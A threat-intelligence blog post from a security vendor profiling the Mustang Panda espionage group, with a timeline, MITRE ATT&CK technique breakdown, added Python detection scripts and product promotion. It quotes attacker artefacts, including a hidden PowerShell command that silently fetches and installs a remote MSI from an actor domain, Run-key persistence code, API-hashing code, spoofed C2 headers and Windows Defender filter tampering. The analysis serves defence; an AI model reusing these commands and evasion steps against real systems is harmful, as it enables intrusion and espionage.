Mustang Panda (TA416) Group: LOTUSLITE, SnakeDisk, and ToneShellws Endpoint Campaign

Umut Bayram | 15 MIN READ

LAST UPDATED ON FEBRUARY 13, 2026

Since emerging in 2012 and gaining notoriety in 2017 for targeting a U.S. think tank, Mustang Panda has maintained an aggressive operational tempo. Their espionage footprint has expanded significantly to include attacks on the Vatican, telecommunications firms, and European diplomatic entities during the invasion of Ukraine. This strategic agility was further demonstrated through sustained campaigns against government bodies in the Philippines, Slovakia, and attendees of the 2024 ASEAN-Australia Summit. Even after a significant international law enforcement operation in early 2025 neutralized their widespread PlugX infrastructure, the group quickly retooled later that year with the localized SnakeDisk USB worm and the LOTUSLITE backdoor to renew attacks against U.S. policy organizations in 2026.

The group employs a diverse set of tactics, techniques, and procedures, often initiating infections via spearphishing emails containing malicious attachments or links, as well as through USB propagation using the SnakeDisk worm. To maintain persistence and evade detection, they utilize DLL side-loading with legitimate binaries, modify registry keys for startup execution, and employ kernel-mode rootkits to hide artifacts. Their toolkit includes custom malware like LOTUSLITE and ToneShell, which leverage command-and-control infrastructure often masked by legitimate services like Cloudflare or masqueraded as benign web traffic. Furthermore, Mustang Panda demonstrates sophistication by using geofencing to restrict payload delivery to specific targets and employing native APIs or PowerShell to execute commands while bypassing security controls such as Windows Defender.

In this post, we will review Mustang Panda's major historical operations, detail its significant intrusions against global government and diplomatic entities, and dissect the group's most remarkable tactics, techniques, and procedures to reveal how it executes persistent cyberespionage campaigns. In the end, we will show how Picus Platform helps defend against this group.


What Are the Major Activities of the Mustang Panda Group?

2012 – The group is assessed to have commenced operations [1].

April 2017 – A U.S.-based think tank was targeted, leading to the first observation of the group and the identification of its unique tactics, techniques, and procedures [2].

May 2020 – The Vatican and the Catholic Diocese of Hong Kong were targeted prior to the renewal of a provisional agreement between the Vatican and China [3].

March 2021 – Telecommunication companies were targeted in a cyberespionage campaign dubbed "Operation Diànxùn" [4].

September 2021 – Malware samples utilizing the ToneShell backdoor and ToneIns downloader were first detected [5].

February–March 2022 – European diplomatic entities were targeted with lures related to the invasion of Ukraine, marking a shift in focus from Southeast Asian targets [6].

July 2022 – A second variant of ToneShell was observed in a global campaign targeting critical organizations, including those in Myanmar [5].

August 2023 – Government organizations in the Philippines and Slovakia were targeted in separate cyberespionage campaigns [4].

March 2024 – Malware packages were deployed against organizations in Myanmar, the Philippines, Japan, and Singapore, coinciding with the ASEAN-Australia Special Summit [7].

14 January 2025 – An international law enforcement operation was announced that removed PlugX malware from over 4,000 infected computers in the United States [8].

Mid-August 2025 – The SnakeDisk USB worm was discovered, engineered to execute exclusively on devices with Thailand-based IP addresses and subsequently drop the Yokai backdoor [9].

January 2026 – U.S. government and policy organizations were targeted with the LOTUSLITE backdoor using Venezuela-themed spear phishing emails [10].

Which MITRE ATT&CK Techniques Are Used by Mustang Panda?

Tactic: Resource Development

T1583.001 Acquire Infrastructure: Domains

It was observed that Mustang Panda registered command-and-control (C2) servers for a campaign using NameCheap services [11].

T1587.001 Develop Capabilities: Malware

The threat actor employed a custom C++ backdoor tracked as LOTUSLITE. This implant is capable of communicating with a hard-coded IP-based command-and-control server and executing remote tasks [12].

T1587.003 Develop Capabilities: Digital Certificates

To bypass security controls, the group utilized a stolen or leaked digital certificate to sign their malicious driver. The certificate was issued to "Guangzhou Kingteller Technology Co., Ltd." and was valid between August 2012 and August 2015 [11].

Tactic: Initial Access

T1091 Replication Through Removable Media

Mustang Panda deployed a USB worm, identified as SnakeDisk, which detects and weaponizes USB devices to propagate. The worm copies itself to the drive and tricks users into executing it [9].

T1566.001 Phishing: Spearphishing Attachment

Mustang Panda initiated an infection chain via a targeted spear-phishing campaign. This involved the distribution of a politically themed ZIP archive, named "US now deciding what's next for Venezuela.zip", containing a legitimate executable and a malicious DLL [12].

T1566.002 Phishing: Spearphishing Link

The group used spearphishing emails containing links to remotely hosted HTML files. These files were often hosted on legitimate services like Microsoft Azure (e.g., https[:]//cdn7s65[.]z13[.]web[.]core[.]windows[.]net) to initiate the infection chain [13].

Tactic: Execution

T1059.001 Command and Scripting Interpreter: PowerShell

Malicious LNK and MSC files executed PowerShell commands to retrieve and install remotely hosted Windows Installer (MSI) files. The commands often used the InstallProduct method and flags like REMOVE=ALL.

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden $install=New-Object -ComObject 'Windows Installer.Installer'; $install.uilevel = 2; $install.InstallProduct('http://estmongolia[.]com/Үер усны сэрэмжлүүлэг', 'REMOVE=ALL');

(Source: Recorded Future [13])

The payload above launches a hidden PowerShell instance and creates a Windows Installer COM object, which lets a script drive software installation programmatically. Setting UILevel to 2 (silent) suppresses every installer wizard and pop-up, so the user sees nothing on screen. The InstallProduct call then makes Windows Installer fetch the remote MSI package from the specified URL and process it.
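As an added detection example (not code from the page or from any vendor), the Python below scores PowerShell script-block text for the combination of traits just described: a hidden window, a Windows Installer COM object, a silent UI level, a remote MSI URL passed to InstallProduct, and the REMOVE=ALL property. The host names, URL and log lines are constructed and the indicator labels are hypothetical.

```python
import re

# Constructed sample script-block texts (hypothetical hosts, placeholder URL);
# the first mirrors the hidden-PowerShell / Windows Installer pattern above.
SAMPLE_SCRIPT_BLOCKS = [
    ("WS-01", "-windowstyle hidden $install=New-Object -ComObject "
              "'WindowsInstaller.Installer'; $install.uilevel = 2; "
              "$install.InstallProduct('http://lure.example.invalid/pkg', 'REMOVE=ALL');"),
    ("WS-02", "$i = New-Object -ComObject WindowsInstaller.Installer; "
              "$i.InstallProduct('C:\\Deploy\\app.msi', 'ACTION=INSTALL')"),
    ("WS-03", "Get-ChildItem C:\\Temp | Where-Object { $_.Length -gt 1MB }"),
]

# One regex per indicator; the ProgID match tolerates a space in "Windows Installer".
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "installer_com": re.compile(
        r"New-Object\s+-ComObject\s+['\"]?Windows\s*Installer\.Installer", re.I),
    "silent_ui":     re.compile(r"\.uilevel\s*=\s*2\b", re.I),
    "remote_msi":    re.compile(r"InstallProduct\(\s*['\"]https?://", re.I),
    "remove_all":    re.compile(r"REMOVE\s*=\s*ALL", re.I),
}


def score_block(text):
    """Return the names of all indicators that match one script-block text."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def find_suspicious(blocks, min_hits=2):
    """Flag (host, indicators) where a remote MSI fetch co-occurs with at least
    one more indicator; a purely local, interactive install (WS-02) is not flagged."""
    hits = []
    for host, text in blocks:
        found = score_block(text)
        if "remote_msi" in found and len(found) >= min_hits:
            hits.append((host, found))
    return hits


if __name__ == "__main__":
    for host, found in find_suspicious(SAMPLE_SCRIPT_BLOCKS):
        print(host, "->", ", ".join(found))
```

Feed it the script text from PowerShell script-block logging rather than the command line alone, since the argument list can be hidden behind encoded or staged commands.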

T1106 Native API

Mustang Panda extensively utilizes Native APIs for different purposes, such as registering callbacks [11].

ZwQuerySystemInformation
FltRegisterFilter
CmRegisterCallbackEx
ObRegisterCallbacks
PsSetCreateProcessNotifyRoutine

Tactic: Persistence

T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

To ensure LOTUSLITE malware survives system reboots, Mustang Panda modifies the Windows Registry. The malware uses the SHSetValueA API to add an entry to the current user's Run key [12].

SHSetValueA(
    HKEY_CURRENT_USER,
    "Software\\Microsoft\\Windows\\CurrentVersion\\Run",
    "<An attacker defined string>",
    <Data type>,
    "<Path to the executable>",
    "<Buffer size>");

Tactic: Defense Evasion

T1014 Rootkit

A kernel-mode rootkit is employed to hide the actor's activities. The rootkit protects its own module, the injected user-mode processes, and specific registry keys from being accessed or removed by security tools. The protected registry keys and the registry operations that are monitored by the rootkit are shown below:

# Protected Registry Keys
ProjectConfiguration
ProjectConfiguration\Instances
ProjectConfiguration\Instance

# Registry Operations Monitored
RegNtPreCreateKey
RegNtPreOpenKey
RegNtPreCreateKeyEx
RegNtPreOpenKeyEx

By keeping watch over four distinct registry operations, the callback effectively blocks any attempt to access keys on its protected list by issuing the 0xC0000022 (STATUS_ACCESS_DENIED) error code [11].

T1027.007 Obfuscated Files or Information: Dynamic API Resolution

A malicious driver used by the group obfuscates its behavior by dynamically resolving API addresses using a hashing algorithm rather than static imports. The hashing algorithm identified is:

func hashString(str []byte) uint64 {
    var seed uint64 = 131313 // Seed values used in other modules: 1313131, 13131313
    var hash uint64 = 0
    for i := 0; i < len(str); i++ {
        hash = hash*seed + uint64(str[i]) // unsigned overflow simply wraps at 64 bits
    }
    return hash
}

(Source: Securelist [11])
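An added analyst helper (not part of the page or of the Securelist write-up) that reproduces the hash above in Python, pre-computes it for candidate kernel exports under all three seeds, and resolves hashes pulled from a sample back to names. The candidate list contains the five APIs named under T1106 plus a few other real kernel exports chosen here as examples; the sample hash list is constructed.

```python
MASK64 = (1 << 64) - 1
SEEDS = (131313, 1313131, 13131313)  # the seed above plus the two noted for other modules


def api_hash(name, seed=131313):
    """Multiplicative string hash from the driver, masked to mimic Go's uint64 wraparound."""
    h = 0
    for b in name.encode("ascii"):
        h = (h * seed + b) & MASK64
    return h


# Names to pre-hash: the five APIs listed under T1106 plus other real kernel
# exports a rootkit commonly touches (the extras are added here, not from the page).
CANDIDATE_APIS = [
    "ZwQuerySystemInformation", "FltRegisterFilter", "CmRegisterCallbackEx",
    "ObRegisterCallbacks", "PsSetCreateProcessNotifyRoutine",
    "FltUnregisterFilter", "CmUnRegisterCallback", "ObUnRegisterCallbacks",
    "PsSetCreateProcessNotifyRoutineEx", "ZwOpenKey", "ZwDeleteKey",
]


def build_table(names=CANDIDATE_APIS, seeds=SEEDS):
    """Map hash -> (name, seed) for every candidate under every seed."""
    table = {}
    for seed in seeds:
        for name in names:
            table[api_hash(name, seed)] = (name, seed)
    return table


def resolve(hashes, table):
    """Return (hash, name, seed) per input hash; unknown hashes yield (hash, None, None)."""
    return [(h,) + table.get(h, (None, None)) for h in hashes]


if __name__ == "__main__":
    tbl = build_table()
    # Constructed input: one hash that should resolve and one junk value.
    sample = [api_hash("ObRegisterCallbacks", 1313131), 0xDEADBEEF]
    for h, name, seed in resolve(sample, tbl):
        print(f"{h:#018x} -> {name} (seed {seed})")
```

Extend CANDIDATE_APIS with the export names of ntoskrnl.exe and fltmgr.sys to cover a real sample's import table.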

T1036.005 Masquerading: Match Legitimate Resource Name or Location

The threat actor disguised the malicious network traffic to appear benign. Command-and-control traffic was crafted to mimic legitimate web activity by using specific HTTP headers, including a Googlebot User-Agent and a Microsoft Host header [12].

# The traffic is sent to a malicious IP address, but this header claims it is destined for 'microsoft.com'.
Host: microsoft.com

# The Referer adds credibility by implying the request originated from a Google search.
Referer: https://www.google.com/

# The User-Agent impersonates the 'Googlebot' web crawler.
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +https://www.google.com/bot.html)
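An added triage example (not from the page or from Acronis) that scores proxy-log records for the three header traits above: a crawler User-Agent sent by an internal client (crawlers visit your servers, workstations never present that UA), a Host header whose destination IP is not where that name is expected to resolve, and a POST that claims a search-engine referer. The records, the internal ranges and the expected-IP map are constructed placeholders.

```python
from ipaddress import ip_address, ip_network

INTERNAL_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# Constructed: where this organisation has observed microsoft.com resolving
# (documentation range used as a placeholder, not real Microsoft address space).
EXPECTED_HOST_NETS = {"microsoft.com": [ip_network("198.51.100.0/24")]}
CRAWLER_TOKENS = ("googlebot", "bingbot")

# Constructed proxy records: 0 mirrors the headers above, 1 is a normal user,
# 2 is a real crawler fetching the organisation's own web server from outside.
RECORDS = [
    {"src": "10.0.5.21", "dst": "203.0.113.45", "host": "microsoft.com", "method": "POST",
     "ua": "Mozilla/5.0 (compatible; Googlebot/2.1; +https://www.google.com/bot.html)",
     "referer": "https://www.google.com/"},
    {"src": "10.0.5.22", "dst": "198.51.100.7", "host": "microsoft.com", "method": "GET",
     "ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/120.0", "referer": ""},
    {"src": "203.0.113.200", "dst": "10.0.9.5", "host": "www.corp.example", "method": "GET",
     "ua": "Mozilla/5.0 (compatible; Googlebot/2.1; +https://www.google.com/bot.html)",
     "referer": ""},
]


def indicators(rec):
    """Return the indicator labels (hypothetical names) that apply to one record."""
    found = []
    src, dst = ip_address(rec["src"]), ip_address(rec["dst"])
    ua = rec["ua"].lower()
    if any(t in ua for t in CRAWLER_TOKENS) and any(src in n for n in INTERNAL_NETS):
        found.append("crawler_ua_from_internal_client")
    nets = EXPECTED_HOST_NETS.get(rec["host"].strip().lower())
    if nets is not None and not any(dst in n for n in nets):
        found.append("host_header_ip_mismatch")
    # A click on a search result is a GET; a POST body "from a Google search" is odd.
    if rec["method"].upper() == "POST" and rec["referer"].rstrip("/").endswith("google.com"):
        found.append("post_with_search_referer")
    return found


def triage(records, min_hits=2):
    """Return (index, indicators) for records with at least min_hits indicators."""
    out = []
    for i, rec in enumerate(records):
        found = indicators(rec)
        if len(found) >= min_hits:
            out.append((i, found))
    return out


if __name__ == "__main__":
    for i, found in triage(RECORDS):
        print(RECORDS[i]["src"], "->", RECORDS[i]["dst"], ", ".join(found))
```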

T1036.007 Masquerading: Double File Extension

LNK files were disguised with double extensions (e.g., doc.lnk) and manipulated icons (e.g., the Microsoft Word icon) to trick users into believing they were opening benign documents [13].

T1112 Modify Registry

The group searches the registry to identify the configuration of WdFilter in order to modify its altitude [11]. WdFilter.sys (officially the Microsoft Defender Antivirus Mini-Filter Driver) is the specific filter driver used by Windows Defender to protect the computer in real-time. The altitude value for WdFilter is stored in the HKLM\SYSTEM\CurrentControlSet\Services\WdFilter\Instances\WdFilter Instance registry key. Modifying this value alters the driver's position in the I/O stack (or prevents it from loading entirely). This allows threat actors to write malicious content to disk without detection.

T1480 Execution Guardrails

Mustang Panda utilized Cloudflare's geofencing capabilities to restrict access to the next stage of the infection chain. The download of the malicious payload was permitted only if the victim's IP address originated from specific target countries, such as Myanmar, Vietnam, or Cambodia [13].

T1564.001 Hide Artifacts: Hidden Files and Directories

Mustang Panda attempted to conceal the malicious payload within the delivery directory. The malicious DLL file, kugou.dll, was given the hidden file attribute so the user would not notice it immediately [12].

Also, the group used SnakeDisk malware, which hides the victim's legitimate files in a concealed directory. It then places a malicious executable in the root directory and renames it to match the USB volume label (or sets it to 'USB.exe'). This tricks the user into double-clicking the malware, thinking they are opening the drive or a folder [9].

T1574.001 Hijack Execution Flow: DLL

In a campaign, Mustang Panda relied on DLL side-loading to execute malicious code. The actor utilized a legitimate, signed executable (originally a launcher for the KuGou music streaming service) to load the malicious kugou.dll file located in the same directory [12].

Launcher: Maduro to be taken to New York.exe (Legitimate KuGou binary)
Malicious Payload: kugou.dll

Tactic: Discovery

T1033 System Owner/User Discovery

LOTUSLITE backdoor utilizes the GetUserNameA function to identify the username of the compromised environment [12].

T1082 System Information Discovery

LOTUSLITE backdoor enumerates the host's machine name using standard Windows API functions like GetComputerNameA [12].

Additionally, the HTML files used in the initial access phase of a campaign enumerated the victim's operating system via the browser's user agent to determine if the target was running Windows before delivering the malicious payload [13].

T1614 System Location Discovery

SnakeDisk confirmed it was executing on a machine in Thailand by querying an external IP geolocation service (ipinfo.io). It checked if the "country" field in the response matched "THA" or "TH" [9].

Tactic: Command and Control

T1001.003 Data Obfuscation: Protocol or Service Impersonation

The ToneShell backdoor disguises its network traffic as TLS 1.3 by prepending a fake header (0x17 0x03 0x04) to the XOR-encrypted payload [11]. This exploits the opacity of the 'Application Data' content type (0x17); because security tools cannot decrypt the payload, they often permit the traffic based solely on the legitimate appearance of the protocol header. This can allow attackers to stealthily maintain Command and Control (C2) flow.
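An added network-side check (not from the page or from Kaspersky) that walks the TLS record headers of a captured client-to-server stream and flags what a protocol imitation like the one above leaves behind: Application Data as the very first record where a real session opens with a Handshake record, a record-layer version of 0x0304 (RFC 8446 keeps legacy_record_version at 0x0303 even for TLS 1.3, so 0x0304 never appears on the wire), and record lengths that do not tile the captured bytes. The sample streams and XOR key are constructed; the fake sample assumes a plausible length field, so the other two checks carry the detection.

```python
import struct

HANDSHAKE, APPLICATION_DATA = 0x16, 0x17
# Record-layer versions conformant stacks emit; TLS 1.3 still uses 0x0303 (0x0301 on an initial ClientHello).
VALID_RECORD_VERSIONS = {0x0301, 0x0302, 0x0303}


def inspect_stream(stream):
    """Return anomaly labels (hypothetical names) for a client->server byte stream."""
    if len(stream) < 5:
        return ["truncated_header"]
    anomalies, offset, index = [], 0, 0
    while offset + 5 <= len(stream):
        ctype, version, length = struct.unpack("!BHH", stream[offset:offset + 5])
        if index == 0 and ctype == APPLICATION_DATA:
            # Genuine sessions begin with a ClientHello inside a Handshake record.
            anomalies.append("application_data_first")
        if version not in VALID_RECORD_VERSIONS:
            anomalies.append("bad_record_version")
        offset += 5 + length
        index += 1
    if offset != len(stream):
        # Declared lengths overshoot or undershoot the bytes actually captured.
        anomalies.append("length_mismatch")
    return list(dict.fromkeys(anomalies))  # dedupe, keep first-seen order


def xor_bytes(data, key):
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


# Constructed samples. Key and payload are placeholders, not ToneShell's.
KEY = b"\x5a"
FAKE_PAYLOAD = xor_bytes(b"beacon-id=0001", KEY)
FAKE_TONESHELL_STYLE = bytes([0x17, 0x03, 0x04]) + struct.pack("!H", len(FAKE_PAYLOAD)) + FAKE_PAYLOAD
GENUINE_HELLO_START = bytes([0x16, 0x03, 0x01]) + struct.pack("!H", 5) + b"\x01\x00\x00\x01\x00"
MIDSTREAM_APPDATA = bytes([0x17, 0x03, 0x03]) + struct.pack("!H", 4) + b"abcd"

if __name__ == "__main__":
    for label, s in (("fake", FAKE_TONESHELL_STYLE), ("genuine", GENUINE_HELLO_START),
                     ("midstream", MIDSTREAM_APPDATA)):
        print(label, inspect_stream(s))
```

A capture that starts mid-connection also yields application_data_first on its own, so treat that label as weak unless bad_record_version accompanies it.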

T1071.001 Application Layer Protocol: Web Protocols

The LOTUSLITE backdoor communicates with its command-and-control server using the HTTP protocol. It leverages Windows WinHTTP APIs to establish connections and transmits data via POST requests over TCP port 443 [12].

WinHttpOpen(v3, 0, 0, 0, 0);
WinHttpSetTimeouts(v4, 120000, 120000, 120000, 120000);
WinHttpConnect(v5, v6, 0x1BB, 0); // Port 443
WinHttpOpenRequest(v7, L"POST", v9, 0, 0, 0, 0x800000);

T1102 Web Service

Mustang Panda consistently used the Cloudflare Content Delivery Network (CDN) to proxy C2 traffic to their backend servers. This allowed the malicious traffic to blend in with legitimate CDN traffic and complicated victim identification [13].

Tactic: Exfiltration

T1041 Exfiltration Over C2 Channel

Mustang Panda configured the LOTUSLITE backdoor to exfiltrate collected data directly through the established command-and-control channel. The implant supports data exfiltration capabilities, transmitting information within the body of the HTTP POST requests [12].

How Does Picus Simulate Mustang Panda Group Attacks?

We strongly suggest simulating Mustang Panda attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for the Mustang Panda Group:

Threat ID | Threat Name | Attack Module
26889 | CANONSTAGER Loader Email Threat | E-mail Infiltration
91913 | STATICPLUGIN Malware Downloader Email Threat | E-mail Infiltration
96620 | CANONSTAGER Loader Download Threat | Network Infiltration
88865 | SOGU.SEC Backdoor Malware Download Threat | Network Infiltration
26440 | STATICPLUGIN Malware Downloader Download Threat | Network Infiltration
70787 | SOGU.SEC Backdoor Malware Email Threat | E-mail Infiltration
56290 | Mustang Panda Threat Group Campaign Malware Download Threat | Network Infiltration
59489 | Mustang Panda Threat Group Campaign Malware Email Threat | E-mail Infiltration
91310 | Mustang Panda Threat Group Campaign | Windows Endpoint
34239 | Mustang Panda Threat Group Campaign Backdoor Malware Download Threat | Network Infiltration
67644 | Mustang Panda Threat Group Campaign Backdoor Malware Email Threat | E-mail Infiltration
93720 | Mustang Panda Threat Group Campaign Malware Dropper Download Threat | Network Infiltration
97124 | Mustang Panda Threat Group Campaign Malware Dropper Email Threat | E-mail Infiltration
59444 | TONESHELL Backdoor Malware Download Threat | Network Infiltration
91901 | TONESHELL Backdoor Malware Email Threat | E-mail Infiltration
90428 | TONESHELL Malware Dropper Download Threat | Network Infiltration
27468 | TONESHELL Malware Dropper Email Threat | E-mail Infiltration
84986 | Cobalt Strike Beacon Download Threat | Network Infiltration
80049 | Cobalt Strike Beacon Email Threat | E-mail Infiltration
29307 | CrimsonIAS Backdoor Malware Download Threat | Network Infiltration
65097 | CrimsonIAS Backdoor Malware Email Threat | E-mail Infiltration
35324 | MQsTTang Backdoor Malware Download Threat | Network Infiltration
47427 | MQsTTang Backdoor Malware Email Threat | E-mail Infiltration
86723 | PUBLOAD Malware Downloader Download Threat | Network Infiltration
67981 | PUBLOAD Malware Downloader Email Threat | E-mail Infiltration
65814 | TONEINS Malware Dropper Download Threat | Network Infiltration
50546 | TONEINS Malware Dropper Email Threat | E-mail Infiltration
49417 | PlugX RAT Download Threat | Network Infiltration
61335 | PlugX RAT Email Threat | E-mail Infiltration

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.

What Are the Aliases of the Mustang Panda Group?

Mustang Panda is also known as: Bronze President, TEMP.Hex, HoneyMyte, Red Lich, Earth Preta, Camaro Dragon, PKPLUG, Stately Taurus, Twill Typhoon, Hive0154, G0129, TA416, BASIN, LuminousMoth, Polaris, and TANTALUM.

Key Takeaways

  • Despite a significant international law enforcement operation in early 2025 that neutralized their PlugX infrastructure, Mustang Panda demonstrated strategic resilience by retooling with the LOTUSLITE backdoor and SnakeDisk USB worm to target U.S. policy organizations in 2026.
  • The group maintains an aggressive operational tempo targeting global government and diplomatic entities, with campaigns expanding from U.S. think tanks to the Vatican, European diplomatic bodies during the invasion of Ukraine, and attendees of the 2024 ASEAN-Australia Summit.
  • Mustang Panda employs a diverse set of initial access vectors, primarily utilizing spearphishing emails with malicious attachments or links hosted on legitimate services like Azure, as well as physical propagation through the SnakeDisk USB worm.
  • To evade detection and maintain persistence, the group utilizes sophisticated techniques such as DLL side-loading with legitimate binaries, kernel-mode rootkits to hide registry artifacts, and geofencing to restrict payload delivery to specific targets.
  • Command-and-control communications are frequently masked to blend in with benign traffic, utilizing tactics like disguising ToneShell traffic as TLS 1.3 packets or employing Googlebot User-Agents and Microsoft Host headers to mimic legitimate web activity.
  • The group extensively leverages Native APIs and PowerShell commands to execute tasks while bypassing security controls, including the use of rootkits to monitor specific registry operations and block access to protected keys.

References

[1] “Mustang Panda.” Accessed: Jan. 20, 2026. [Online]. Available: https://attack.mitre.org/groups/G0129/

[2] A. Meyers, “Mustang Panda,” CrowdStrike.com. Accessed: Jan. 20, 2026. [Online]. Available: https://www.crowdstrike.com/en-us/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/

[3] “Threat Group Cards: A Threat Actor Encyclopedia.” Accessed: Jan. 20, 2026. [Online]. Available: https://apt.etda.or.th/cgi-bin/showcard.cgi?g=RedDelta&n=1

[4] “Threat Group Cards: A Threat Actor Encyclopedia.” Accessed: Jan. 20, 2026. [Online]. Available: https://apt.etda.or.th/cgi-bin/showcard.cgi?g=Mustang%20Panda%2C%20Bronze%20President

[5] V. T. Intelligence, “ToneShell - APT Mustang Panda’s new weapon,” Viettel Cyber Security. Accessed: Jan. 20, 2026. [Online]. Available: https://viettelsecurity.com/toneshell-apt-mustang-pandas-new-weapon/

[6] S. Huntley, “An update on the threat landscape,” Google. Accessed: Jan. 20, 2026. [Online]. Available: https://blog.google/threat-analysis-group/update-threat-landscape-ukraine/

[7] Accessed: Jan. 20, 2026. [Online]. Available: https://www.imda.gov.sg/-/media/imda/files/regulations-and-licensing/regulations/advisories/infocomm-media-cyber-security/chinese-apt-groups-target-asean-entities.pdf

[8] “Justice Department and FBI Conduct International Operation to Delete Malware Used by China-Backed Hackers.” Accessed: Jan. 20, 2026. [Online]. Available: https://www.justice.gov/archives/opa/pr/justice-department-and-fbi-conduct-international-operation-delete-malware-used-china-backed

[9] G. Mühr and J. Chung, “Hive0154, aka Mustang Panda, drops updated Toneshell backdoor and novel SnakeDisk USB worm.” Accessed: Jan. 20, 2026. [Online]. Available: https://www.ibm.com/think/x-force/hive0154-drops-updated-toneshell-backdoor

[10] The Hacker News, “LOTUSLITE Backdoor Targets U.S. Policy Entities Using Venezuela-Themed Spear Phishing,” The Hacker News. Accessed: Jan. 20, 2026. [Online]. Available: https://thehackernews.com/2026/01/lotuslite-backdoor-targets-us-policy.html

[11] N. Shabab, “The HoneyMyte APT evolves with a kernel-mode rootkit and a ToneShell backdoor,” Kaspersky. Accessed: Jan. 20, 2026. [Online]. Available: https://securelist.com/honeymyte-kernel-mode-rootkit/118590/

[12] Acronis Threat Research Unit, “LOTUSLITE: Targeted espionage leveraging geopolitical themes,” Acronis. Accessed: Jan. 20, 2026. [Online]. Available: https://www.acronis.com/en/tru/posts/lotuslite-targeted-espionage-leveraging-geopolitical-themes/

[13] Insikt Group®, “Chinese State-Sponsored RedDelta Targeted Taiwan, Mongolia, and Southeast Asia with Adapted PlugX Infection Chain.” Accessed: Jan. 21, 2026. [Online]. Available: https://www.recordedfuture.com/research/reddelta-chinese-state-sponsored-group-targets-mongolia-taiwan-southeast-asia

 
Mustang Panda, also known as TA416 or Bronze President, is a cyberespionage group active since 2012. Known for aggressive operations, the group targets global government, diplomatic, and telecommunication entities. Notable campaigns include attacks on the Vatican, European diplomatic bodies during the invasion of Ukraine, and U.S. policy organizations. They employ custom malware like LOTUSLITE and ToneShell alongside tactics such as spearphishing and USB worm propagation.

Mustang Panda is tracked by various security researchers under several aliases. These include Bronze President, TA416, Earth Preta, Red Lich, HoneyMyte, TEMP.Hex, Camaro Dragon, PKPLUG, Stately Taurus, Twill Typhoon, Hive0154, G0129, BASIN, LuminousMoth, Polaris, and TANTALUM. These names often refer to the same cluster of espionage activity and tactics observed across different campaigns.

The group targets government bodies, diplomatic entities, telecommunications firms, and NGOs globally. Specific victims include the Vatican, a U.S. think tank, and organizations in the Philippines, Slovakia, and attendees of the 2024 ASEAN-Australia Summit. In 2026, the group renewed attacks against U.S. government and policy organizations using Venezuela-themed spearphishing emails, while also deploying localized malware against targets in Thailand.

LOTUSLITE is a custom C++ backdoor capable of communicating with a hard-coded IP-based command-and-control server to execute remote tasks. It uses the HTTP protocol for communication and exfiltrates data via POST requests over TCP port 443. The malware ensures persistence by modifying the Windows Registry to add an entry to the current user's Run key, allowing it to survive system reboots.

SnakeDisk is a USB worm engineered to execute exclusively on devices with Thailand-based IP addresses. It propagates by detecting and weaponizing USB devices, copying itself to the drive, and tricking users into executing it. The malware hides legitimate files in a concealed directory and places a malicious executable in the root directory, renaming it to match the USB volume label to deceive victims.

Mustang Panda employs kernel-mode rootkits to hide artifacts and restrict access to specific registry keys. They use geofencing to limit payload delivery to specific countries and masquerade command-and-control traffic as legitimate web activity using Googlebot User-Agents. Additionally, they modify the Windows Defender WdFilter registry key to alter its driver position and bypass real-time protection mechanisms.

Picus allows organizations to test their security controls against Mustang Panda attacks through the Picus Security Validation Platform. Picus simulates real-life cyber attacks using threats from the Picus Threat Library, such as CANONSTAGER, STATICPLUGIN, TONESHELL and LOTUSLITE. This enables users to validate their defenses and obtain actionable mitigation insights to improve resilience against these persistent espionage campaigns.
